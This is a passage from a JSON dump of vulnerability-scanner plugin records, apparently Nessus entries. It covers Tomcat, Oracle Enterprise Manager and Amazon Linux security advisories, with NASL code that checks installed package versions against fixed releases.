mishandling of close in NIO/NIO2 connectors user sessions can get mixed up (CVE-2018-8037)\n\n* tomcat: Insecure defaults in CORS filter enable 'supportsCredentials' for all origins (CVE-2018-8014)\n\n* tomcat: Open redirect in default servlet (CVE-2018-11784)\n\n* tomcat: Host name verification missing in WebSocket client (CVE-2018-8034)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {}, "published": "2019-08-12T00:00:00", "type": "nessus", "title": "Oracle Linux 8 : pki-deps:10.6 (ELSA-2019-1529)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11784", "CVE-2018-8014", "CVE-2018-8034", "CVE-2018-8037"], "modified": "2021-07-15T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:xmlstreambuffer", "p-cpe:/a:oracle:linux:xsom", "cpe:/o:oracle:linux:8", "p-cpe:/a:oracle:linux:apache-commons-collections", "p-cpe:/a:oracle:linux:apache-commons-lang", "p-cpe:/a:oracle:linux:bea-stax-api", "p-cpe:/a:oracle:linux:glassfish-fastinfoset", "p-cpe:/a:oracle:linux:glassfish-jaxb-api", "p-cpe:/a:oracle:linux:glassfish-jaxb-core", "p-cpe:/a:oracle:linux:glassfish-jaxb-runtime", "p-cpe:/a:oracle:linux:glassfish-jaxb-txw2", "p-cpe:/a:oracle:linux:jackson-annotations", "p-cpe:/a:oracle:linux:jackson-core", "p-cpe:/a:oracle:linux:jackson-databind", "p-cpe:/a:oracle:linux:jackson-jaxrs-json-provider", "p-cpe:/a:oracle:linux:jackson-jaxrs-providers", "p-cpe:/a:oracle:linux:jackson-module-jaxb-annotations", "p-cpe:/a:oracle:linux:jakarta-commons-httpclient", "p-cpe:/a:oracle:linux:javassist", "p-cpe:/a:oracle:linux:javassist-javadoc", "p-cpe:/a:oracle:linux:pki-servlet-4.0-api", "p-cpe:/a:oracle:linux:pki-servlet-container", "p-cpe:/a:oracle:linux:python-nss-doc", "p-cpe:/a:oracle:linux:python3-nss", "p-cpe:/a:oracle:linux:relaxngdatatype", "p-cpe:/a:oracle:linux:resteasy", "p-cpe:/a:oracle:linux:slf4j", "p-cpe:/a:oracle:linux:slf4j-jdk14", "p-cpe:/a:oracle:linux:stax-ex", "p-cpe:/a:oracle:linux:velocity", "p-cpe:/a:oracle:linux:xalan-j2", "p-cpe:/a:oracle:linux:xerces-j2", "p-cpe:/a:oracle:linux:xml-commons-apis", "p-cpe:/a:oracle:linux:xml-commons-resolver"], "id": "ORACLELINUX_ELSA-2019-1529.NASL", "href": "https://www.tenable.com/plugins/nessus/127594", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2019:1529 and \n# Oracle Linux Security Advisory ELSA-2019-1529 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(127594);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/07/15\");\n\n script_cve_id(\"CVE-2018-11784\", \"CVE-2018-8014\", \"CVE-2018-8034\", \"CVE-2018-8037\");\n script_xref(name:\"RHSA\", value:\"2019:1529\");\n\n script_name(english:\"Oracle Linux 8 : pki-deps:10.6 (ELSA-2019-1529)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"From Red Hat Security Advisory 2019:1529 :\n\nAn update for the pki-deps:10.6 module is now available for Red Hat\nEnterprise Linux 8.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe Public Key Infrastructure (PKI) Deps module contains fundamental\npackages required as dependencies for the pki-core module by Red Hat\nCertificate System.\n\nSecurity Fix(es) :\n\n* tomcat: Due to a mishandling of close in NIO/NIO2 connectors user\nsessions can get mixed up (CVE-2018-8037)\n\n* tomcat: Insecure defaults in CORS filter enable\n'supportsCredentials' for all origins (CVE-2018-8014)\n\n* tomcat: Open redirect in default servlet (CVE-2018-11784)\n\n* tomcat: Host name verification missing in WebSocket client\n(CVE-2018-8034)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2019-August/008981.html\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected pki-deps:10.6 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:apache-commons-collections\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:apache-commons-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bea-stax-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glassfish-fastinfoset\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glassfish-jaxb-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glassfish-jaxb-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glassfish-jaxb-runtime\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glassfish-jaxb-txw2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:jackson-annotations\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:jackson-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:jackson-databind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:jackson-jaxrs-json-provider\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:jackson-jaxrs-providers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:jackson-module-jaxb-annotations\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:jakarta-commons-httpclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:javassist\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:javassist-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:pki-servlet-4.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:pki-servlet-container\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:python-nss-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:python3-nss\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:relaxngDatatype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:resteasy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:slf4j\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:slf4j-jdk14\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:stax-ex\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:velocity\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:xalan-j2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:xerces-j2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:xml-commons-apis\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:xml-commons-resolver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:xmlstreambuffer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:xsom\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:8\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/08/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/08/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^8([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 8\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"apache-commons-collections-3.2.2-10.module+el8.0.0+5231+3e842911\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"apache-commons-lang-2.6-21.module+el8.0.0+5231+3e842911\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"bea-stax-api-1.2.0-16.module+el8.0.0+5231+3e842911\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"glassfish-fastinfoset-1.2.13-9.module+el8.0.0+5231+3e842911\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"glassfish-jaxb-api-2.2.12-8.module+el8.0.0+5231+3e842911\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"glassfish-jaxb-core-2.2.11-11.module+el8.0.0+5231+3e842911\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"glassfish-jaxb-runtime-2.2.11-11.module+el8.0.0+5231+3e842911\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"glassfish-jaxb-txw2-2.2.11-11.module+el8.0.0+5231+3e842911\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"jackson-annotations-2.9.8-1.module+el8.0.0+5231+3e842911\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"jackson-core-2.9.8-1.module+el8.0.0+5231+3e842911\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"jackson-databind-2.9.8-1.module+el8.0.0+5231+3e842911\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"jackson-jaxrs-json-provider-2.9.8-1.module+el8.0.0+5231+3e842911\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"jackson-jaxrs-providers-2.9.8-1.module+el8.0.0+5231+3e842911\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"jackson-module-jaxb-annotations-2.7.6-4.module+el8.0.0+5231+3e842911\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"jakarta-commons-httpclient-3.1-28.module+el8.0.0+5231+3e842911\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"javassist-3.18.1-8.module+el8.0.0+5231+3e842911\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"javassist-javadoc-3.18.1-8.module+el8.0.0+5231+3e842911\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"pki-servlet-4.0-api-9.0.7-14.module+el8.0.0+5231+3e842911\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"pki-servlet-container-9.0.7-14.module+el8.0.0+5231+3e842911\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"python-nss-doc-1.0.1-10.module+el8.0.0+5231+3e842911\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"python3-nss-1.0.1-10.module+el8.0.0+5231+3e842911\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"relaxngDatatype-2011.1-7.module+el8.0.0+5231+3e842911\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"resteasy-3.0.26-3.module+el8.0.0+5231+3e842911\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"slf4j-1.7.25-4.module+el8.0.0+5231+3e842911\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"slf4j-jdk14-1.7.25-4.module+el8.0.0+5231+3e842911\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"stax-ex-1.7.7-8.module+el8.0.0+5231+3e842911\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"velocity-1.7-24.module+el8.0.0+5231+3e842911\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"xalan-j2-2.7.1-38.module+el8.0.0+5231+3e842911\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"xerces-j2-2.11.0-34.module+el8.0.0+5231+3e842911\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"xml-commons-apis-1.4.01-25.module+el8.0.0+5231+3e842911\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"xml-commons-resolver-1.2-26.module+el8.0.0+5231+3e842911\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"xmlstreambuffer-1.5.4-8.module+el8.0.0+5231+3e842911\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"xsom-0-19.20110809svn.module+el8.0.0+5231+3e842911\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache-commons-collections / apache-commons-lang / bea-stax-api / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-06T15:09:13", "description": "The 13.3.0.0, 13.4.0.0, and 12.1.0.5 versions of Enterprise Manager Base Platform installed on the remote host are affected by multiple vulnerabilities as referenced in the July 2020 CPU advisory.\n\n - Vulnerability in the Enterprise Manager Base Platform product of Oracle Enterprise Manager (component:\n Enterprise Manager Install (jackson-databind)).\n Supported versions that are affected are 13.3.0.0 and 13.4.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Enterprise Manager Base Platform. Successful attacks of this vulnerability can result in takeover of Enterprise Manager Base Platform. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).\n (CVE-2020-9546)\n\n - Vulnerability in the Enterprise Manager Base Platform product of Oracle Enterprise Manager (component:\n Reporting Framework (Apache Struts 2)). Supported versions that are affected are 13.3.0.0 and 13.4.0.0.\n Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Enterprise Manager Base Platform. Successful attacks of this vulnerability can result in takeover of Enterprise Manager Base Platform. CVSS 3.1 Base Score 8.1 (Confidentiality, Integrity and Availability impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H).\n (CVE-2018-11776)\n\n - Vulnerability in the Enterprise Manager Base Platform product of Oracle Enterprise Manager (component:\n Application Service Level Mgmt (Apache Axis)). Supported versions that are affected are 12.1.0.5 and 13.3.0.0.\n Difficult to exploit vulnerability allows unauthenticated attacker with access to the physical communication segment attached to the hardware where the Enterprise Manager Base Platform executes to compromise Enterprise Manager Base Platform. Successful attacks of this vulnerability can result in takeover of Enterprise Manager Base Platform. CVSS 3.1 Base Score 7.5 (Confidentiality, Integrity and Availability impacts).\n CVSS Vector:\n (CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H).\n (CVE-2019-0227)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2020-07-16T00:00:00", "type": "nessus", "title": "Oracle Enterprise Manager Cloud Control (Jul 2020 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11776", "CVE-2019-0227", "CVE-2019-12415", "CVE-2020-2982", "CVE-2020-9546"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:oracle:enterprise_manager"], "id": "ORACLE_ENTERPRISE_MANAGER_JUL_2020_CPU.NASL", "href": "https://www.tenable.com/plugins/nessus/138555", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(138555);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\n \"CVE-2018-11776\",\n \"CVE-2019-0227\",\n \"CVE-2019-12415\",\n \"CVE-2020-2982\",\n \"CVE-2020-9546\"\n );\n script_bugtraq_id(105125, 107867);\n script_xref(name:\"IAVA\", value:\"2020-A-0326\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0004\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n\n script_name(english:\"Oracle Enterprise Manager Cloud Control (Jul 2020 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"The 13.3.0.0, 13.4.0.0, and 12.1.0.5 versions of Enterprise Manager Base Platform installed on the remote host are\naffected by multiple vulnerabilities as referenced in the July 2020 CPU advisory.\n\n - Vulnerability in the Enterprise Manager Base Platform\n product of Oracle Enterprise Manager (component:\n Enterprise Manager Install (jackson-databind)).\n Supported versions that are affected are 13.3.0.0 and\n 13.4.0.0. Easily exploitable vulnerability allows\n unauthenticated attacker with network access via HTTP to\n compromise Enterprise Manager Base Platform. Successful\n attacks of this vulnerability can result in takeover of\n Enterprise Manager Base Platform. CVSS 3.1 Base Score\n 9.8 (Confidentiality, Integrity and Availability\n impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).\n (CVE-2020-9546)\n\n - Vulnerability in the Enterprise Manager Base Platform\n product of Oracle Enterprise Manager (component:\n Reporting Framework (Apache Struts 2)). Supported\n versions that are affected are 13.3.0.0 and 13.4.0.0.\n Difficult to exploit vulnerability allows\n unauthenticated attacker with network access via HTTP to\n compromise Enterprise Manager Base Platform. Successful\n attacks of this vulnerability can result in takeover of\n Enterprise Manager Base Platform. CVSS 3.1 Base Score\n 8.1 (Confidentiality, Integrity and Availability\n impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H).\n (CVE-2018-11776)\n\n - Vulnerability in the Enterprise Manager Base Platform\n product of Oracle Enterprise Manager (component:\n Application Service Level Mgmt (Apache Axis)). Supported\n versions that are affected are 12.1.0.5 and 13.3.0.0.\n Difficult to exploit vulnerability allows\n unauthenticated attacker with access to the physical\n communication segment attached to the hardware where the\n Enterprise Manager Base Platform executes to compromise\n Enterprise Manager Base Platform. Successful attacks of\n this vulnerability can result in takeover of Enterprise\n Manager Base Platform. CVSS 3.1 Base Score 7.5\n (Confidentiality, Integrity and Availability impacts).\n CVSS Vector:\n (CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H).\n (CVE-2019-0227)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/a/tech/docs/cpujul2020cvrf.xml\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/security-alerts/cpujul2020.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the July 2020 Oracle Critical Patch Update advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-11776\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-9546\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Struts 2 Multiple Tags Result Namespace Handling RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 Namespace Redirect OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/07/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:enterprise_manager\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_enterprise_manager_installed.nbin\");\n script_require_keys(\"installed_sw/Oracle Enterprise Manager Cloud Control\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp_name = 'Oracle Enterprise Manager Cloud Control';\n\napp_info = vcf::get_app_info(app:app_name);\n\n# affected versions and patches \n# (mapping added in oracle_enterprise_manager_installed.nbin)\n#\n# 13.4.0\n# 31459685 -> 13.4.0.4\n#\n# 13.3.0.0\n# 31250768 -> 13.3.0.0.200714\n#\n# 12.1.0.5\n# 31250739 -> 12.1.0.5.200714\n \nconstraints = [\n { 'min_version' : '13.4.0.0', 'fixed_version' : '13.4.0.4', 'fixed_display': '13.4.0.4 (Patch 31459685)'},\n { 'min_version' : '13.3.0.0', 'fixed_version' : '13.3.0.0.200714', 'fixed_display': '13.3.0.0.200714 (Patch 31250768)'},\n { 'min_version' : '12.1.0.5', 'fixed_version' : '12.1.0.5.200714', 'fixed_display': '12.1.0.5.200714 (Patch 31250739)' }\n];\n \nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-05T14:39:27", "description": "The host name verification when using TLS with the WebSocket client was missing. It is now enabled by default. Versions Affected: Apache Tomcat 9.0.0.M1 to 9.0.9, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, and 7.0.35 to 7.0.88. (CVE-2018-8034)\n\nThe URL pattern of '' (the empty string) which exactly maps to the context root was not correctly handled in Apache Tomcat 9.0.0.M1 to 9.0.4, 8.5.0 to 8.5.27, 8.0.0.RC1 to 8.0.49 and 7.0.0 to 7.0.84 when used as part of a security constraint definition. This caused the constraint to be ignored. It was, therefore, possible for unauthorised users to gain access to web application resources that should have been protected. Only security constraints with a URL pattern of the empty string were affected. (CVE-2018-1304)\n\nSecurity constraints defined by annotations of Servlets in Apache Tomcat 9.0.0.M1 to 9.0.4, 8.5.0 to 8.5.27, 8.0.0.RC1 to 8.0.49 and 7.0.0 to 7.0.84 were only applied once a Servlet had been loaded.\nBecause security constraints defined in this way apply to the URL pattern and any URLs below that point, it was possible - depending on the order Servlets were loaded - for some security constraints not to be applied. This could have exposed resources to users who were not authorised to access them. (CVE-2018-1305)\n\nThe defaults settings for the CORS filter provided in Apache Tomcat 9.0.0.M1 to 9.0.8, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, 7.0.41 to 7.0.88 are insecure and enable 'supportsCredentials' for all origins.\nIt is expected that users of the CORS filter will have configured it appropriately for their environment rather than using it in the default configuration. Therefore, it is expected that most users will not be impacted by this issue. (CVE-2018-8014)\n\nWhen using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required. This vulnerability report identified a mechanism that allowed: - returning arbitrary files from anywhere in the web application - processing any file in the web application as a JSP Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible. It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations. (CVE-2020-1938)\n\nAs part of our fix for this CVE, we are disabling Tomcat 2019 AJP connector in the default configuration in alignment with the upstream changes. This change will require customers who use the default Tomcat configuration (in which the AJP connector was previously enabled) to explicitly re-enable the connector if they need it. Also take note that a connector configured without an explicit address will only bind to the loopback address.\n\nExamples of output from netstat before and after updating tomcat8 and tomcat7 are below (note that it is the same on AL1 and AL2 with both tomcat7 and tomcat8).\n\nAL2 tomcat8.5 :\n\nbefore :\n\ntcp6 0 0 :::8009 :::* LISTEN 25772/java\n\ntcp6 0 0 :::8080 :::* LISTEN 25772/java\n\ntcp6 0 0 127.0.0.1:8005 :::* LISTEN 25772/java\n\nAfter :\n\ntcp6 0 0 :::8080 :::* LISTEN 25772/java\n\ntcp6 0 0 127.0.0.1:8005 :::* LISTEN 25772/java\n\nTo re-enable the AJP port in Tomcat, users can follow the steps below :\n\n1) For AL2 Core (tomcat7): Uncomment the following line in /etc/tomcat/server.xml and restart the service\n\n\n\n2) For AL2 Tomcat8.5 extra: Uncomment the following line in /etc/tomcat/server.xml and restart the service\n\n\n\nSee also :\n\nApache Tomcat release notes\n\nTomcat 7\n\n<a href='http://tomcat.apache.org/security-8.html#Fixed_in_Apache_Tomcat_ 8.5.51'>Tomcat 8\n\nRedHat <a href='https://access.redhat.com/solutions/4851251'>solutions", "cvss3": {}, "published": "2020-03-16T00:00:00", "type": "nessus", "title": "Amazon Linux 2 : tomcat (ALAS-2020-1402)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-1304", "CVE-2018-1305", "CVE-2018-8014", "CVE-2018-8034", "CVE-2020-1938"], "modified": "2023-01-11T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:tomcat", "p-cpe:/a:amazon:linux:tomcat-admin-webapps", 